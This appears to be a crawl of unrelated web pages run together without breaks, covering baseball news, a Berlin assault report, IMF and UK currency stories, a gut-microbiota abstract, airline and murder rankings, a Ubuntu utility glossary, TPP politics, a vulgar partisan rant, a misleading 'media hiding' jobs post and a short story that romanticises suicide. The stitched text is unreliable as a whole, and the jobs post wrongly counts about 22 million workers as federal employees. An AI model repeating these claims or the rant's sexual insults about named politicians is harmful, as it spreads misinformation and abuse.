“Everybody told me all the numbers are good this year, good for getting that award, but I don't know what happened,” Ramos said. “All of my numbers was really good. Every night before I go to bed, I said, that's for me and my family would call me every day and they were waiting for the last moment. But it's happening, you know. Next year will be another year. Try to do better.”
As he has for eight straight years now, Yadier Molina happened. No one else really had a choice. But Ramos's defensive metrics rank him as one of the game's best behind the plate. He caught three no-hitters in a little more than a season.
“I'm very happy, very excited about all I did behind the plate,” Ramos said. “Made me feel good because [I'm] learning, every year, more and more. With my offensive, I'm a little bit not happy, but know I have to work. I'm going to work a lot to try to do a better job next season.”
Earlier this offseason, Nationals President of Baseball Operations Mike Rizzo said that Ramos would be hard to replace, but he will be a free agent after the 2016 season, which makes him a little more disposable. Few catchers who rate so high defensively with so much power would be available via trade, or elsewhere, in the near future. The Nationals think highly of Brewers catcher Jonathan Lucroy, a top-tier catcher who could be considered an upgrade, but would need to trade pieces to get him. For now, Ramos is “El General,” a catcher known for his offense who played better behind the plate than at it this season, the leader of the pitching staff the Nationals' prize as the organization's gem.
Several teams in need of a left-handed bat could inquire about the availability of outfielder New York Yankees outfielder Brett Gardner, reports Nick Cafardo of the Boston Globe.
Yankees general manager Brian Cashman said he is “open to listening on anything” this offseason, and one commodity would be Gardner, a solid defensive player who hit .261/.351/.362 last season.
The Yankees continue to reshape their roster following the summer blockbusters involving Aroldis Chapman and Andrew Miller and would be looking for prospects in return for the 33-year-old Gardner, who is owed $24 million over the next two seasons with a $2 million buyout for 2019. Any interested team would likely be looking for some financial relief.
Ken Rosenthal of Fox Sports speculated last week the Houston Astros, who have a lineup heavy on righty hitters and some money to spend, might be interested in Gardner and/or Yankees catcher Brian McCann.
-- Doug Mittler
A Jewish man who was badly beaten by a group of Muslim youths on the Berlin U-Bahn has come forward to say he does not want what happened to him to be used to incite anti-Muslim feeling.
Shahak Shapira, a 26-year-old Israeli citizen resident in Germany , was attacked when he tried to film a group of Muslim youths singing an anti-Semitic song in the early hours of New Year's Day.
“The incident must not be abused to incite hatred against Muslims,” Mr Shapira said in an interview with Süddeutsche Zeitung newspaper. “I have already noticed how some are trying to exploit it. My attackers could just as easily have been neo-Nazis and beaten an Arab.”
Mr Shapira, who has lived in Germany for 12 years, was travelling with a group of friends in a packed U-Bahn carriage when a group of young men started singing an anti-Semitic song, and cursing Jews and Israel.
When two people sitting next to the group asked them to stop, the youths threatened them and spat at them, Mr Shapira said. He started to film the incident on his mobile phone, but when he tried to get off the train at Friedrichstrasse station, in central Berlin, the group followed him and demanded that he delete the footage.
When he refused, they attacked him, punching and kicking him. He was pulled back onto the safety of the train by his friends.
Mr Shapira said his attackers were speaking a language that sounded like Arabic or Turkish. He told them he was Israeli, but believes they may not have heard him.
Several of Mr Shapira's family were murdered by the Nazis, and his grandfather, Amitzur Shapira, an athletics coach, was among those killed in the 1972 attack on the Munich Olympics by the Palestinian group Black September.
There was a wave of anti-Semitic incidents in Germany last year, including attacks on Jewish people on the streets of Berlin.
But Mr Shapira told reporters he was more concerned by the recent anti-Muslim protests that have been gripping Germany than by the country's neo-Nazi scene.
“The educated people, people from the bourgeoisie, who mingle with the Nazis at the anti-Muslim demonstrations are dangerous,” he said. “They are tolerant of the intolerant.”
WASHINGTON (MarketWatch) - The executive board of the International Monetary Fund said Monday it had "full confidence" in IMF Managing Director Christine Lagarde despite a French court convicting her of negligence. "The executive board reaffirms its full confidence in the managing director's ability to continue to effectively carry out her duties," the IMF board said in a statement. The board said it had met regularly to consider the legal proceeding as it progressed in the French courts. In February, Lagarde won a second five-year term as head of the international financial organization. "The executive board looks forward to continuing to work with the managing director to address the difficult challenges facing the global economy," the statement said.
Have breaking news sent to your inbox. Subscribe to MarketWatch's free Bulletin emails. Sign up here.
Image caption Douglas Carswell is calling for a range of currencies to be made legal tender
Parliament is to debate a call for foreign currencies to be made legal tender in the UK.
Such a move would protect savers by allowing them to hold the currency least likely to be devalued, Tory MP Douglas Carswell told the Commons.
He said people could then "extricate themselves from the monetary masters that hold them all captive".
But Labour's John Mann dismissed the plan, saying Parliament should "defend the great currency sterling".
MPs decided to give Mr Carswell's idea - set out in a 10-minute rule bill - another hearing on 20 January, but it is unlikely to become law.
Mr Carswell, a euroscpetic Conservative who represents Clacton in Essex, said legalising other currencies would allow consumers to shop around for the best deal on goods, possibly via smartphone applications.
'Credit balloon'
In the Commons he said the Bank of England's "quantitative easing" programme - effectively "printing money" - had seemed "progressive" but "turned out to be a disaster" which had cut sterling's value.
He added: "A credit balloon was created by reckless management when it came to the money supply."
Mr Carswell claims the two dominant post-war economic theories - monetarism and Keynesianism - have both failed, and radical thinking is needed amid the ongoing global financial crisis.
when I go to the corner shop to buy my Midget Gems, I wish to use sterling John Mann, Labour MP
He accepts that government ministers and the Bank of England would be highly reluctant to relinquish control of the nation's currency, but insists he is serious about the proposal.
Wealthy individuals routinely convert their cash into Swiss francs or other currencies deemed to be safe havens to be then held in bank accounts abroad.
Some large department stores in London take euros and some other foreign currencies, such as the US dollar and the Japanese yen, but the official currency of the UK remains sterling.
No MP objected to holding a debate on Mr Carswell's plan.
However, Mr Mann, who represents Bassetlaw in Nottinghamshire, told the Commons during humorous exchanges: "We should defend the great currency sterling against these demands for euro-fanaticism."
He added: "He [Mr Carswell] could always ask for the Iranian Rial and other currencies to be used.
"[But] when I go to the corner shop to buy my Midget Gems, I wish to use sterling."
'Completely free market'
Giving citizens a choice of currencies was proposed in a Conservative government Treasury paper in the late 1980s, as an alternative to the single European currency.
But the idea dates back to the early 1970s, when economist Friedrich Hayek first proposed the denationalisation of currencies.
Professor Hayek - the godfather of Thatcherite economic policy - put the idea forward as a potential cure for inflation, then the biggest threat facing the UK economy.
In a 1975 paper for the Insititute of Economic Affairs think tank, he argued that governments should be stripped of the power to force their citizens to use currency issued by them at a price they specify.
Neil Mellor, a currency strategist at Bank of New York Mellon, said Mr Carswell's plan would have to be executed on a massive scale for it to have any impact on the economy.
"It doesn't sound like something that would be taken too seriously at the Bank of England, but we will have to see," he told the BBC News website.
Josh Ryan Collins, of the New Economics Foundation, who helped launch the Brixton pound - one of a handful of complementary currencies designed to be spent in local shops within a specific area of the UK - also sounded a note of caution.
"I would have some sympathy with Douglas's position and his critique of the current system, which isn't really democratic.
"But I wouldn't say a completely free market in currency is necessarily the solution."
He said it could increase instability and currency speculation, and greater democratic accountability was needed instead, as well as the break-up of the big banks.
Accumulating evidence suggests that the gut microbiota is an important factor in mediating the development of obesity-related metabolic disorders, including type 2 diabetes. Metformin and berberine, two clinically effective drugs for treating diabetes, have recently been shown to exert their actions through modulating the gut microbiota. In this study, we demonstrated that metformin and berberine similarly shifted the overall structure of the gut microbiota in rats. Both drugs showed reverting effects on the high-fat diet-induced structural changes of gut microbiota. The diversity of gut microbiota was significantly reduced by both berberine- and metformin-treatments. Nearest shrunken centroids analysis identified 134 operational taxonomic units (OTUs) responding to the treatments, which showed close associations with the changes of obese phenotypes. Sixty out of the 134 OTUs were decreased by both drugs, while those belonging to putative short-chain fatty acids (SCFA)-producing bacteria, including Allobaculum, Bacteriodes, Blautia, Butyricoccus, and Phascolarctobacterium, were markedly increased by both berberine and, to a lesser extent, metformin. Taken together, our findings suggest that berberine and metformin showed similarity in modulating the gut microbiota, including the enrichment of SCFA-producing bacteria and reduction of microbial diversity, which may contribute to their beneficial effects to the host.
Welcome to /r/Anarchy101 !
Anarchy101 is for any questions about:
the theory of anarchism
the theory of anarchism anarchist movements
anarchist movements anarchist opinions on certain situations or current events
anarchist opinions on certain situations or current events socialist or communist theory in general.
No question is too basic (or advanced!) to ask, so don't be shy :)
Guidelines
Read the Anarchism in a nutshell page of the wiki.
Please do not debate, or post in an antagonistic manner. /r/Anarchy101 is only intended for educational discussion, not to "disprove" anarchism - consider /r/DebateAnarchism if you are interested in debate.
Please do not discuss events from other subreddits. This is not a brigade, drama, or SRS-style sub. Posts and comments about other subreddits will be removed.
Please use the report button if you see any antagonistic, rude, oppressive or clearly incorrect comments.
Do NOT downvote or criticise what you consider to be a simple or "stupid" question. This is a place for learning and education, everyone deserves the benefit of the doubt.
For the general anarchism subreddit, check out For the general anarchism subreddit, check out /r/Anarchism . To learn about other communist philosophies, try /r/Communism101
Review the Anti-Oppression Policy to see how you can help make space for marginalized people.
IRC room
Resources
British Airways has slumped closer to the foot of the table in an annual ranking of short-haul airlines by consumer champions Which?
After a year in which the UK flag carrier suffered a crippling technical meltdown and replaced free snacks on its short-haul flights with paid-for M&S fare, the airline fell from a mid-table position last year to third from bottom, achieving a customer satisfaction score of 52 per cent, down from 67 per cent.
In the recent Telegraph Travel Awards, BA, too, suffered a fall from grace, slipping from top to 13th in the short-haul category.
Which? respondents were asked to rank airlines across a number of categories, including seat comfort, customers service and value for money, while seat pitch and punctuality were also taken into account.
BA was not the only under-performer in the rankings. Ryanair, which has enjoyed a torrid year including enforcement action from the Civil Aviation Authority, sat at the bottom of the table, alongside Vueling, with the joint worst score.
The best short-haul airlines, according to Which? readers Aurigny Air Services - 80% Jet2 - 76% Norwegian - 76% Aer Lingus - 73% Swiss - 73% Air Malta - 68% Lufthansa - 68% KLM - 67% SAS - 66% Eurowings - 65% EasyJet - 64% Flybe - 64% Monarch* - 64% Thomson - 59% TAP Portugal - 57% Wizz - 56% Thomas Cook - 54% BA - 52% Ryanair - 45% Vueling - 45% *No longer flying
At the other end of the spectrum, Jet2 and Norwegian were tied for the second spot, each scoring 76 per cent for customer satisfaction, while Aurigny Air (which serves the Channel Islands of Guernsey and Alderney and ranked third in Telegraph Travel's survey of 90,000 readers) came top, with a score of 80 per cent.
In the long-haul category, BA slipped again, dropping 10 percentage points for customer satisfaction from 60 to 50.
Singapore Airlines finished top of the Which? survey for the second year in a row, with a customer satisfaction score of 88 per cent. The Singapore carrier was also ranked top in the Telegraph Travel Awards.
Singapore Airlines triumphed in the long-haul category
Emirates came second (82 per cent) and Qatar Airways third (78 per cent).
American carriers United and American both performed poorly, achieving scores of 39 and 46 per cent respectively.
The best long-haul airlines, according to Which? readers Singapore Airlines - 88% Emirates - 82% Qatar Airways - 78% Cathay Pacific - 75% Virgin - 71% Malaysia Airlines - 69% KLM - 66% Delta - 65% Etihad - 65% South African Airways - 59% Air Transat - 56% Thomas Cook - 56% Thomson - 56% Air Canada - 50% BA - 50% American Airlines - 46% United - 39%
Rory Boland, Which? travel editor, said: “Passengers are telling us that there are many different ways to be a great airline, but providing great service at an acceptable price is a must-have.
“BA's poor customer satisfaction shows it clearly needs to step up its game in a year that has been beset with problems. From the food and drink on offer, to the poor value for money of the journey itself, the airline has a lot of work to do to improve the experience that passengers associate with the airline.”
The airline told Which? that it was a “premium airline committed to customer choice”.
“In 2018, our investments for customers will include 20 new aircraft, even more new routes, upgraded cabin interiors, significantly improved catering in long-haul economy and the roll-out of our new Club catering and bedding services across our long-haul network,” it said.
The most murderous places in England and Wales have been revealed by the Home Office (Picture: Ross Parry)
A town in Lincolnshire is the most murderous place in England and Wales, according to the Home Office.
New figures released claim Boston had a higher number of murders, attempted murders and conspiracies to murder per 100,000 people than anywhere else.
There were two murders and eight attempted murders there in the year up to September 2015.
The City of London was the next highest, although as its residential population is tiny meaning that one murder was enough to make it appear high on the list.
Gloucester and Blackpool all so feature high on the list, with eight and 7.8 murderous crimes per 100,000 people.
MORE: Man found dead in burning tent under railway bridge
MORE: Woman who stabbed paedophile to death has sentence doubled
The number of murders in England and Wales went up from 502 to 573 in 12 months – a 14 per cent increase.
Advertisement
Advertisement
And attempted murders went up from 511 to 611.
Following the release of the figures Lincolnshire Police Supt Paul Timmmins told the Boston Standard: ‘Using population data to compare crime rates will inevitably not provide the truest national picture but we do acknowledge that there have been a number of tragic incidents in Boston in recent years.
‘In most cases, arrests, charges and convictions followed swiftly and Lincolnshire remains a low crime county with one of the lowest recorded rates for violent crime in the country.'
The most murderous places in England and Wales Boston – 10 crimes, 15 per 100,000 people City of London – 1 crime, 12.4 per 100,000 people Gloucester – 10 crimes, 8 per 100,000 people Blackpool – 11 crimes, 7.8 per 100,000 people Lincoln – 7 crimes, 7.3 per 100,000 people Manchester – 33 crimes, 6.3 per 100,000 people Salford – 15 crimes, 6.2 per 100,000 people Rochdale – 13 crimes, 6.1 per 100,000 people Hackney – 15 crimes, 5.7 per 100,000 people Amber Valley – 7 crimes, 5.6 per 100,000 people
This post covers the utilities those start with Z. The last article of the useful ubuntu utility glossary series. I started with this exercise on 18 Nov, 2013 for spreading an awareness on the useful but sometimes lesser known utilities available by default on the Ubuntu repositories. Quite happy to draw the line after going through more than 45,000 packages on Synaptic Package Manager single-handed.
zathura (Graphics) : PDF viewer with a minimal interface. zenity (GNOME Desktop Environment) : Display graphical dialog boxes from shell scripts. zerofree (System Administration) : Zero free blocks from ext2, ext3 and ext4 file-systems. zeroinstall-injector (System Administration) : Cross-distribution packaging system. zeya (Multimedia) : Media player that lets you bring your music to any computer with a web browser. zim (Miscellaneous – Graphical) : Graphical text editor based on wiki technologies. zipcmp, zipmerge (Utilities) : Compare, merge zip utilities. ziproxy (Networking) : Forwarding HTTP proxy server aimed to speed up low-bandwidth connections. It does so by gzipping HTML and using lossy compression of GIF, PNG and JPEG pictures. Ziproxy also offers JPEG 2000 support, transparent proxying and more. zoneminder (Networking) : Video camera security and surveillance solution. ZoneMinder is intended for use in single or multi-camera video security applications, including commercial or home CCTV, theft prevention and child, family member or home monitoring and other domestic care scenarios such as nanny cam installations. It supports capture, analysis, recording, and monitoring of video data coming from one or more video or network cameras attached to a Linux system. zoomer (Graphics) : Generate a video from a picture by zooming from one point to another. zorp (Networking) : A next generation, open source proxy firewall with deep protocol analysis. Zorp GPL allows you to inspect, control, and modify traffic on the application layer of the ISO/OSI model. Decisions can be made based on data extracted from the application-level traffic (for example, HTTP) and applied to a certain traffic type such as users or client machines. zsh (Shells) : A shell designed for interactive use, although it is also a powerful scripting language. zssh (Networking) : Interactive file transfers over ssh. zutils (Utilities) : A collection of utilities able to deal with any combination of compressed and uncompressed files transparently. The provided utilities are:
zcat – Decompresses and copies files to standard output.
zcmp – Decompresses and compares two files byte by byte.
zdiff – Decompresses and compares two files line by line.
zgrep – Decompresses and searches files for a regular expression.
ztest – Tests integrity of compressed files.
zupdate – Recompresses files to lzip format.
President Obama's trade deal with 11 other Pacific Rim countries is in deep trouble with Congress.
Speaker Paul Ryan Paul Davis RyanBrexit and exit: A transatlantic comparison Five takeaways from McCabe's allegations against Trump The Hill's 12:30 Report: Sanders set to shake up 2020 race MORE (R-Wis.) and Senate Finance Committee Chairman Orrin Hatch Orrin Grant HatchThe FDA crackdown on dietary supplements is inadequate Orrin Hatch Foundation seeking a million in taxpayer money to fund new center in his honor Mitch McConnell has shown the nation his version of power grab MORE (R-Utah) haven't decided whether they're going to support the Trans-Pacific Partnership (TPP) — even after they helped the president win fast-track authority in a bruising interparty fight that was meant to ease its passage.
ADVERTISEMENT
Republicans are deeply disappointed with the deal negotiated by Obama's team, as are many business groups, which have yet to embrace it. Some are suggesting the administration may need to reopen the negotiations, even if that means seeking an accord with a smaller number of countries.
The presidential race will only make lawmakers fight harder.
Democratic front-runner Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesman: Clinton staff are 'biggest a--holes in American politics' MORE opposes the trade deal, making it difficult for Obama to pick up more Democratic votes.
On the Republican side, presidential candidate Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say he should get less than 10 years in prison MORE is against the trade pact, while Ben Carson supports it. Sen. Ted Cruz Rafael (Ted) Edward CruzTrump unleashing digital juggernaut ahead of 2020 Inviting Kim Jong-un to Washington Trump endorses Cornyn for reelection as O'Rourke mulls challenge MORE (R-Texas) has not taken a formal position on the pact, but argues the deal should not be considered in a lame-duck session under any circumstances. A fourth GOP candidate, Marco Rubio Marco Antonio RubioHillicon Valley: Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Trump unleashing digital juggernaut ahead of 2020 MORE, backed fast-track authority for Obama in the Senate but hasn't taken a position on the negotiated TPP — a sign of the broad discontent among Republicans.
The reactions — from lukewarm support to outright hostility — have led many to believe the deal doesn't have the votes to pass Congress.
“We believe the agreement is in trouble,” said one senior Republican aide in the Senate.
Obama, Ryan and Hatch all worked overtime to win fast-track authority this summer. In doing so, they took on members of their own party and became targets for grassroots opponents of globalization.
The TPP was supposed to be worth the hard work; if accepted, it would be the largest trade deal the U.S. has negotiated since the North American Free Trade Agreement with Canada and Mexico. The pact is also a key part of Obama's effort to pivot the United States toward Asia.
Fast-track authority means the deal cannot be amended or filibustered in the Senate, greatly enhancing its chances for approval. That's why winning the power was such a huge victory for Obama, Ryan and Hatch.
Yet fewer than six months later, it's looking like a hollow victory.
In a speech at the U.S. Chamber of Commerce one day after the TPP's text was released, Hatch suggested the pact might need to be reopened by the U.S. Trade Representative's office (USTR).
“While I understand that parties have deemed the negotiations closed, the agreement cannot enter into force if Congress doesn't agree to it,” Hatch said in the speech. “At the end of the day, USTR may need to go back to the negotiating table and try again.”
Obama administration officials have privately suggested to business groups and the press that that option is
infeasible.
While the U.S. has reopened talks in the past on bilateral deals, doing so with the TPP would involve getting the 11 other countries to agree to go back to the negotiating table, something all sides see as extraordinarily difficult.
A House GOP aide, acknowledging the difficulty, said it would be “a big deal if we had to go down that route.”
Still, Republicans believe Obama may not have a choice if the votes simply aren't there to pass the deal.
The president only needs 51 votes in the Senate because fast-track prevents a filibuster, but the House vote would be a nail-biter.
Administration officials have talked about picking up votes in both parties, but Republicans believe winning votes from more than the 28 Democrats who backed fast-track would be a long shot.
Brand-name pharmaceutical companies are disappointed with patent protections in the deal, though the trade group PhRMA has yet to take a formal position on the TPP.
The accord would give U.S. companies exclusive control for five to eight years of data on biologics, drugs made from living organisms — a new frontier for the industry.
That's a better deal than the industry has now from a number of trading partners in the TPP but less than its demands for 12 years of protections, a standard spelled out as an objective in the fast-track law.
Hatch and pharmaceutical companies had hoped the TPP would set the standard for future trade deals. Some company CEOs were furious that the Obama administration only won five years of certain protections.
A separate provision in the TPP allows governments to impose controls meant to curb smoking and prevents tobacco companies from using the trade agreement's dispute settlement system to sue for damages on their investments. The tobacco provisions are sure to cost the deal votes from North Carolina Republicans in the House and Senate, and GOP aides don't believe they will win the administration any new votes.
It's possible Congress could wait for a lame-duck session to consider the TPP. That would at least alleviate the pressure of taking it up during a presidential race.
Yet sources on both sides of the issue argue a lame-duck vote would be very difficult.
If Clinton were elected president, it would mean a vote in a lame-duck session on legislation that splits Obama from his successor.
And if a Republican were to triumph, there could be calls to wait to renegotiate the deal until the new president takes office. If a Republican opposed to the deal wins the White House, there may be pressure on the GOP to hold off on the vote.
Lawmakers in Congress who must make the decisions on timing have yet to decide, highlighting the uncertainty facing one of Obama's last legislative goals in office.
This story was corrected at 10:16 a.m. Nov. 18 to reflect that Sen. Ted Cruz (R-Texas) has not taken a formal position on the TPP.
Moscow, October 12, 2016
Religious faith in Russia never grew more intensively than in the past three decades, believes Metropolitan Hilarion of Volokolamsk.
The head of the Department of External Church Relations (DECR) spoke about religious faith in Russia, and its history and revival in recent decades at a meeting with a group of professors and 250 students from Italy on October 11, 2016, reports the DECR's website.
“The epoch which we call ‘the second Baptism of Russia' begun in our Church in 1988. The mass baptism of our population started in Russia in the late ‘80s and early ‘90s,” Metropolitan Hilarion said while relating the history of Orthodoxy in Russia to the Italian guests.
“Today we have 35,000 churches. That means that we have opened 29,000 churches over twenty-eight years, opening more than 1,000 churches per year or three per day… Earlier we had three theological seminaries or academies, and today there are over fifty,” the metropolitan stressed.
In Metropolitan Hilarion's view, Russian history has “never witnessed such growth in religious faith as we have seen in the past twenty-eight years.”
“More than that, I know no other precedent of this kind anywhere throughout the history of mankind. We are aware that the epoch of St. Constantine the Great in the fourth century was a time when churches were built everywhere and mass baptisms took place. But there is no statistics for that period, while we do have statistics for the epoch we live in,” he added.
Noting that today many say that modern society lives in the post-Christian era, the representative of the Russian Orthodox Church said that it is not felt in Russia.
“With our own eyes we have seen the power of Christianity which enables us to open three churches per day today. We have witnessed how Christianity transforms human lives, to what extent Christ and His teaching are still important nowadays,” Metropolitan Hilarion said in conclusion.
Professors and students of schools under the Jesuit Order in Rome, Milan, Naples, Turin and Palermo took part in the meeting with the Chairman of the Department for External Church Relations.
Margaret, just when I was thinking I could go back to minding my own business baking bread and watching my shows, another small-dick Republican has to prove that the size of his tiny pecker doesn't prevent him from screwing a whole lot of women. And so here I am again, typing instead of baking. You know me. When I've got nothing good to say, I usually say it.
Add the name Glenn Hagar to our ever growing list of Asshats. This one is still wet behind the ears and thinks his wife Dara should be barefoot and in the kitchen. Want to know why Governor Rick Perry really called a special session? Laws that they couldn't pass in the regular session can be pushed through in the majority-rules special session. Laws like the one sponsored by State Senator Glenn Hegar from Katy. Hegar thinks screwing poor women in rural Texas is fun and he has sponsored a law that will screw millions of them by closing down women's health clinics throughout the state. In between bragging about how godly he is, Hegar's website offers us this description of little Glenn – Senator Hegar is a true conservative who strongly defends the values of faith, family, and freedom. Of course if by freedom you mean freedom for men to control women – well then yes, I guess that's a true statement. Just like the gun owners he also champions, Glenn wants to have a pecker but not take responsibility for firing it.
Glenn wasn't alone in this mind you. His accomplice is an idiot named Rep. Jody Laubenberg, a Botox bitch from Parker. Yes, Jody is a woman who apparently would eat her own vagina to prove she is loyal to Rick and Glenn. Wait. That didn't sound right. She would eat her unborn child to prevent another woman from having access to… No. That's not right either. Oh hell. What do you say about a woman who thinks that another woman who has been raped should not have access to an abortion because…and I quote, “In the emergency room they have what's called rape kits, where a woman can get cleaned out.” Now there is a real idiot's idiot. Never mind that rape kits have nothing to do with cleaning out anything. The fact that a woman would have no sympathy for another woman's rape. Well, I just didn't think I would live long enough to see that.
But thank goodness for women like State Senator Wendy Davis who actually paid attention in school and developed her brain instead of an unhealthy fascination with plastic surgery like Ms. Laubenberg. Right now Wendy is filibustering in the Texas Capitol to stop Rick, Glenn and Jody from taking us any farther back into the dark ages. If you live in Austin, head to the Capitol and cheer her on.
It's all too clear now. Rick Perry's personal little special legislative session was just another pathetic attempt to continue his never-ending war on women. Perry and his Aggie Boy Toy Hagar can't wait to screw millions of women. I'm still unclear what's in it for Jody – maybe a lifetime supply of Botox? This time the small-minded and even smaller-dicked Republicans in the Texas Legislature are attempting to deny the full spectrum of reproductive healthcare to the millions of poor women in rural Texas. The laws those asshats are trying to pass will mean that only rich women in Austin, San Antonio, Dallas and Houston will have access to an abortion– everyone else can just go have a few more babies or find a coat hanger. Lucky for Dara Hegar. She lives in Katy just outside of Houston. She and her daughters will have no trouble getting an abortion should they so choose. And good thing Jody lives near Dallas so that her daughter, Liz, can still get an abortion despite Mother's nasty law. And as we all know, they are the ones who usually do.
Somebody get me a magnifying glass. If there's going to be a vote, I want to see if Glenn Hagar is man enough to take on the masses of women in District 18 who will vote him out of office during the next election. But my money is on Wendy. Go, honey. Go. I mean it. Really.
Click here to support Margaret and Helen's website.
Advertisements
The mainstream media is keeping Americans in the dark — again.
According to numbers released on Friday by the Bureau of Labor Statistics, the January jobs report shows an increase in 5,000 manufacturing jobs.
While that's a great start for the Trump administration, it's not what the media's hiding from you.
Out of fear of giving President Trump any sort of positive coverage, establishment news outlets are not reporting the fact that 10,000 government jobs have completely vanished.
In just two weeks, the federal government went from 22,286,000 employees to 22,276,000 employees.
There's still a lot more cutting to do, but at this rate, it won't take very long to slash the bloated administration created under Obama by an entire third. To give reference, in the entirety of 2016, from the start of January to the end of December, 162,000 government jobs were added and 46,000 manufacturing jobs were lost.
This first 2017 jobs report gives hope for the future.
Trump's top campaign promise was to cut the size and scope of government — and he's already fulfilling that.
SHARE on Facebook and Twitter if you're ready to see the federal government diminished greatly!
http://www.wedgies.com/question/who-won-the-first-presidential-debate-fknbentbe
The following story by Sarah will appear in S/tick's upcoming issue, theme: Torn. You can visit Sarah's website here, or follow her on Twitter! And check back here for another post on Monday.
Pool Party (TW)
Sherry ought to have been having a good time at Jessica's pool party, sashaying around in her caftan and oversized shades, but the dead girl at the bottom of the jacuzzi made it hard. The submerged body, a sleepy odalisque, a greek statue in a string bikini, lay on the bottom step in the fetal position. Every few minutes, while Sherry walked back and forth with margaritas in her hands or crunching on those addictive lime-flavored corn chips, she'd peer over at the hot tub and catch a glimpse of her limbs forming a giant letter “G,” like Gucci. Or Gabbana. Guests congregated at the area where the poolside pebbles met the wooden deck slats, at a respectful distance from the corpse and closer to the grill. Sherry respected their zest for life, but for her it was a downer.
Finally, while sitting on a deck chair with her legs gracefully stretched out to reveal her new pedicure, Sherry shored up enough liquid courage to ask Jessica's boyfriend, Steve B, what the deal was with the figure beneath the ripples.
He volunteered that the girl, named Marina (of course, thought Sherry, with a name like that) had been hanging out, taking shots on the deck a few weeks ago—and out of nowhere announced that she was crawling into the hot tub for a permanent break. It was so warm, she'd told them.
“We tried to talk her out of it, poor thing,” said Steve B. “I mean Steve over there practically pinned her back, and look at the guns on that guy.” He referred of course to Steve C, manning the grill. But, Steve B continued, Marina had been so truly determined, and everyone knows no number of interventions and pleas can stop someone if they're dead set on a self-destructive path. People have to make their own choices, and so on. Did Sherry feel him?
It was true, Sherry acknowledged.
“She was like way more tan back then,” said Steve B, nostalgic for Marina's short life. “Chlorine can bleach a person out.”
“What's going to happen to her?” asked Sherry, rapidly losing her buzz. “How has she just stayed there?”
“We couldn't get her out,” said Steve B. “She just put her hands under her head like a pillow, lay down, and stuck like stone. She's like, a fixture now.”
Sherry sensed that she was bumming Steve out by dwelling on the Marina situation. She released him to go mingle; Steve was a champion mingler.
Now she sat alone by the pool and pulled her caftan tight. In the water, her reflection wobbled, a smear of girl on the surface. Her thoughts, like magazine pages, turned to all the calories in those margaritas, and sobering up for the drive home; yet the image of Marina entombed down there by herself, the whirr of the hot tub just above her, coaxed a sigh or two from her lips.
It frightened her a little bit, how quickly she got the idea to join Marina on the bottom step, curled up like a child and eternally sudsy, and how firmly the idea stayed. She envisioned a dozen young women lying marbled in a row beneath the swirling waters, each one joining the next. Tinkling, laughing splashing sounds would serenade them, above the surface of their peace. Her heart twisted, then got the dropping feeling, like when she came to a party like this to rendezvous with some guy specifically and he finked on her–and all the bubbles inside her turned flat.
Fortunately she hadn't had any plans like that today. A stray strand of wind rustled her hair; she recollected that there would be nights, too, when Jessica and her parents turned off the heat, the whirlpool and the porch lights, and the only whooshing sound then would come from the cold air moving across the dead leaves and rainwater on the rubber jacuzzi cover, or the rustle of animals in the well-kept hedges and trees.
Sherry considered whether being eternally alabaster underneath the surging jets was worth such solitary nights.
She shivered and concluded only this: that the thing to do now would be put her thoughts side, eat a hot dog, and then get Steve C to sleep with her. And never one to deviate from a plan, she did.
But even as the boy's warm living hand moved up her leg in the car, she could feel her skin turning pearly and hard, and her breathing slowing as her lungs filled with chlorine.
Copyright Notice: All work appearing on this blog is copyrighted to its stated author and has been posted with permission. Please post a link to a post you like rather than reblogging in order to avoid copyright infringement.
This story was produced in partnership with the
Thanks to government subsidies, many St. Louis-area residents will be able to afford health insurance for the first time, beginning in 2014. But the insurance they'll be able to buy will offer a limited range of options.
This trend toward less value is happening not only on the new health insurance marketplaces, also known as health exchanges, in Missouri, Illinois and other states, but also on the “open market,” where health policies have traditionally been sold.
In 2014, experts say, health care consumers are likely to face higher monthly premiums and more financial risk as deductibles and out-of-pocket limits rise.
The sticker shock will be greatest for those who already have individual insurance policies and don't qualify for subsidies.
Compared to the health plans available now, many consumers also will be paying more next year for coverage that offers fewer choices of physicians and hospitals.
“Deductibles are going up. Premiums are going up. (Provider) networks are getting tighter,” said Vincent Blair, a health insurance broker in Webster Groves.
Jeff Rousseau, 42, in O'Fallon, Mo., is among those who will — sooner or later — feel the effects on his wallet.
Rousseau receives insurance from the St. Louis company where he works, but his wife and two young children — Laura, 38; Caroline 8; and Grant, 6 — were expensive to keep on his employer's health plan, so he opted two years ago to purchase coverage for them from Anthem Blue Cross and Blue Shield in Missouri.
When that plan expires, Rousseau said he could pay almost twice as much to cover his family under Anthem's new narrow network, even though it may not include his wife's doctor at Mercy Hospital St. Louis.
“I'm kind of in no-man's land because I can't get on the exchange,” he said.
Under the Affordable Care Act, insurance carriers cannot deny coverage because of a person's pre-existing medical conditions. And insuring everyone, including the unhealthy, is costly.
The new health law also mandates that nearly all policies offer free preventive care such as flu shots, mammograms and colonoscopies, which adds to insurance costs.
The new health insurance marketplace — the online exchange run in Missouri by the federal government — offers residents on the Missouri side of the St. Louis area about two dozen individual and family health plans from only two insurers: Maryland-based Coventry Healthcare, and Anthem Blue Cross and Blue Shield in Missouri.
Glitches have prevented most consumers from accessing Missouri's online exchange. The Post-Dispatch has analyzed some of the plans, based on materials provided by insurers and federal health officials.
Anthem's rates appear to be higher, and its provider networks are likely to be much more restrictive in terms of consumer choice, according to a federal database of insurance rates and local health insurance brokers.
The least-expensive Coventry plan — available only to adults under age 30 or those who can prove hardship — provides catastrophic coverage only. The premium for a 27-year-old nonsmoker is about $100 a month, according to data disclosed by the U.S. Department of Health and Human Services.
One of the most expensive and comprehensive Anthem plans on the Missouri health exchange is the Gold Direct Access “ccab” plan (Anthem's plans, which have similar names, are distinguished by specific initials). At first glance, its relatively low co-pays and deductible of $750 makes it one of the most attractive plans offered on the exchange.
For a 27-year-old nonsmoker in the St. Louis area, the monthly premium for this plan is $292, before subsidies, according to the federal database. For a 50-year-old nonsmoker, the monthly premium is $497. A family with two 30-year-old adults and two children would pay a monthly premium of $986, before subsidies.
